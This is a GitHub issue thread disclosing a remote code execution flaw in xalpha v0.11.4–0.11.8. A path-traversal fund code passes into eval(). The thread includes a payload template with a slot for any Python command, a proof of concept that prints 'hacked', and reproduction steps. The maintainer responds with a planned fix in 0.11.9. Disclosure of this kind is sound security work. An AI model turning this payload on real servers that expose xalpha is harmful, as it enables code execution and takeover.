### ISSUE TITLE
[Warning] RCE in xalpha v0.11.4 ~ v0.11.8

### ISSUE THREAD

**Issue by Leeyangee** [refraction-ray/xalpha#175]
Vulnerability Product: xalpha v0.11.4 ~ v0.11.8
Vulnerability version: v0.11.4 ~ v0.11.8
Vulnerability type: Remote Command Execute
Vulnerability Details: 
Vulnerability location: xalpha/info.py -> fundinfo._basic_init

without verifying the code user input and using dangerous function eval();, causes rce in xalpha v0.11.4 ~ v0.11.8 at xalpha/info.py -> fundinfo._basic_init
<img width="655" alt="image" src="https://github.com/refraction-ray/xalpha/assets/101627018/e10183a5-7945-411d-9033-4bb49247f487">

payload = ```../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = {your rce python command}; &_=1688890155531#```

test_payload = ```../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#```

let's take the latest version released in the Github v0.11.4 as an example
firstly pip3 install xalpha==0.11.4
```
pip3 install xalpha==0.11.4
```

secondly import xalpha 
```python
import xalpha
```

thirdly call xalpha.fundinfo("../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#")
here take the test_payload as argument of the function
```python
xalpha.fundinfo("../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#")
```

folloing you could see, it successfully run the py code
<img width="1134" alt="image" src="https://github.com/refraction-ray/xalpha/assets/101627018/45e6b1f3-cb11-47f8-9266-f00ea2c94772">

proved rce
Also you can prove rce in version 0.11.8, but v0.11.4 is a stable version

reason:
the self.url could be relocate path to / by ..
![image](https://github.com/refraction-ray/xalpha/assets/101627018/06183e0a-5906-4539-b2c6-25b4f9812818)
if you input the test_payload ```../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#```, the path will be relocated to /gaoduan/PinzhongRightApi.aspx and callback, the re.match only check the body of response
<img width="542" alt="image" src="https://github.com/refraction-ray/xalpha/assets/101627018/f4172947-6250-4192-9208-954854230305">
never check the position of data
<img width="886" alt="image" src="https://github.com/refraction-ray/xalpha/assets/101627018/65e18645-4ad4-403f-b89f-a038a06baff4">
so causes rce

discovered by leeya_bug

**Comment by refraction-ray** [comment]
Thanks for the thorough report. The quickest fix is to first check the ``code`` format when initiating `fundinfo`? i.e., it has to be six digits instead of a url str. If this protection is implemented, do you see any potential risk left? 

Besides, can you see any scenario that the current issue can have realistic security issues? Because to me, the fundinfo code is written by the users themselves.

**Comment by refraction-ray** [comment]
Ah, i think i see your point now. The scenario could be someone who host a website using xalpha as backend, then when the use input some weird fund code, the backend server can run something very bad **if the server has no check on the user's input more than bare xalpha**. In this case, the loophole can be used to weaken the server (say a fund summary website backend by xalpha, if any)

**Comment by Leeyangee** [comment]
Actually you could just check the code format when initiating fundinfo, you can simply avoid this vulnerability in this way. But I suggest that you replace eval() with safer functions to prevent vulnerabilities that may occur in the future.

yeah, if someone host a website using xalpha as backend, The attackers could use the above methods to directly obtain server permissions (attackers could use functions such as os.system() to execute cmd and directly obtain the cmd shell.)

**Comment by refraction-ray** [comment]
shall be fixed in 0.11.9
